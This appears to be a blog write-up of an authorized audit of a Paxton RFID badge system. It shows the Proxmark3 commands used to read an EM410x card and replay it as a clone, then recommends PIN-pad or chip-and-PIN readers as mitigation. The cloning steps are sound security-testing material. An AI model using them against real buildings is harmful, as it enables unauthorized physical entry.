Recently I engaged in a audit of a Paxton badging system, and I would like to go over the results of said audit. The tool of choice I used was the Proxmark3

The objectives of this test were as follows:

Test whether replay attacks are possible against the Paxton badging system.

If (1) is possible, see if the badging system (Paxton) detects and alerts to the replay attack

If (1) is possible and (2) does not detect the breach, investigate possible mitigations with the current system.

The first part consist of “stealing” and cloning a badge. Then attempting a “replay” attack against the the following Paxton badge readers:

Using the built in CLI of the Proxmark3, I was able to scan the the provided “stolen” card using the following command: lf search , the dump that results is:

EM TAG ID : 010FXXXXXX

Unique TAG ID : 80F0XXXXXX

Possible de-scramble patterns

HoneyWell IdentKey {

DEZ 8 : 043XXXXX

DEZ 10 : 02559XXXXX

DEZ 5.5 : 03906.XXXXX

DEZ 3.5A : 001.XXXXX

DEZ 3.5B : 015.XXXXX

DEZ 3.5C : 066.XXXXX

DEZ 14/IK2 : 000045509XXXXX

DEZ 15/IK3 : 0005537867XXXXX

DEZ 20/ZK : 080015000402080XXXXX

}

Other : 00335_066_04325711

Pattern Paxton : XXXXXXXX [XXXXXXXX]

Pattern 1 : XXXXXXXX [XXXXXXXX]

Pattern Sebury : 3XX XX 4XXXXXXX [XXXXX XXXX XXXXXXXX]

Valid EM410x ID Found!

After running the search, I was able to extract the EM TAG ID from the dump and then using the following command lf em4x em410xsim 010FXXXXXX I was able to make the the Proxmark3 in conjunction with a Low Frequency antenna broadcast as my “stolen” badge, below is the attack in action.

So a few things:

I know that badge readers are very susceptible to these types of “replay” attacks, The objective was to see if the backend Paxton system would be able to (A) differentiate between a cloned “badge” and the real thing, and (B) alert the proper people that a “clone and replay” attack had occurred. In both instances the answer was NO.

My suggestion to this particular company was to replace the Paxton badge readers and backend Paxton with a more recent system that utilizes chip and pin cards, and provides alerts for when a suspected cloned badge is being used.

Overall, Paxton is not a bad system, if this company, were to say replace their non pin pad badge readers with the the pin pad badge readers, then the attacker would require a second bit of information (the pin of the user) to get past the doors, making a physical breach a bit more difficult.

For further reading, please read this.

Share this: Tweet



